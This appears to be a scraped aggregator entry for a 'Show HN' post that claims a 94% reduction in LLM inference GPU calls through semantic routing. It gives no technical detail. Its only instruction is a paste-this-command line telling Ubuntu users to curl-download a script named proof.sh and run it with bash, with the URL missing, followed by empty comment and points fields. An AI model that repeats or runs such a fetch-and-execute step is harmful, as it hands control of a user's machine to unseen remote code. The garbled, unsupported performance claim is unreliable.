Show HN: I reduced LLM inference GPU calls by 94% using semantic routing

Hacker News Show AI • June 01, 2026

Generative AI AI Hardware

On any ubuntu curl -fsSL -o ~/proof.sh bash ~/proof.sh Comments URL: Points: 2 # Comments: 1